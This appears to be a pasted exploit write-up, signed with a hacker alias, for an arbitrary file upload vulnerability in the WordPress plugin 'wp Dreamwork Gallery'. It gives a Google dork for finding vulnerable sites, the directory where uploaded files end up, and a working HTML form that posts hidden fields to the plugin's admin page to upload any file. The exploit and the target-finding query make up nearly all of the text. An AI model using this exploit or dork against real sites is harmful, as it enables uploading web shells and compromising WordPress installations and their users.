SHOW:
|
|
- or go back to the newest paste.
| 1 | <!-- | |
| 2 | ||
| 3 | ||
| 4 | \ \ / (_)_ __ _ _ ___\ \/ / _ \ ____ | |
| 5 | \ \ / /| | '__| | | / __|\ /| | | |_ / | |
| 6 | \ V / | | | | |_| \__ \/ \| |_| |/ / | |
| 7 | \_/ |_|_| \__,_|___/_/\_\____//___| | |
| 8 | ||
| 9 | --> | |
| 10 | ######################################################### | |
| 11 | # Exploit Title: Arbitrary File Upload Vulnerability in wp Dreamwork Gallery | |
| 12 | # Contact: FB: Abdou MjCodez Tw: VirusXDz | |
| 13 | # Category: webapps | |
| 14 | # Google Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/ | |
| 15 | ######################################################## | |
| 16 | ||
| 17 | ||
| 18 | ||
| 19 | # Proof of Concept | |
| 20 | ||
| 21 | the uploaded file will be located in the directory | |
| 22 | ||
| 23 | Example : [(7)_uploadfolder] | |
| 24 | /wp-content/uploads/dreamwork/7_uploadfolder/big/ | |
| 25 | ||
| 26 | ||
| 27 | <html> | |
| 28 | <body> | |
| 29 | <form action="http://[path to WordPress]/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> | |
| 30 | <input type="hidden" name="task" value="drm_add_new_album" /> | |
| 31 | <input type="hidden" name="album_name" value="Arbitrary File Upload" /> | |
| 32 | <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> | |
| 33 | <input type="file" name="album_img" value="" /> | |
| 34 | <input type="submit" value="Submit" /> | |
| 35 | </form> | |
| 36 | </body> | |
| 37 | </html> | |
| 38 | ||
| 39 | Video : | |
| 40 | https://youtu.be/_7uAkAzlFrY | |
| 41 | ||
| 42 | Bye |
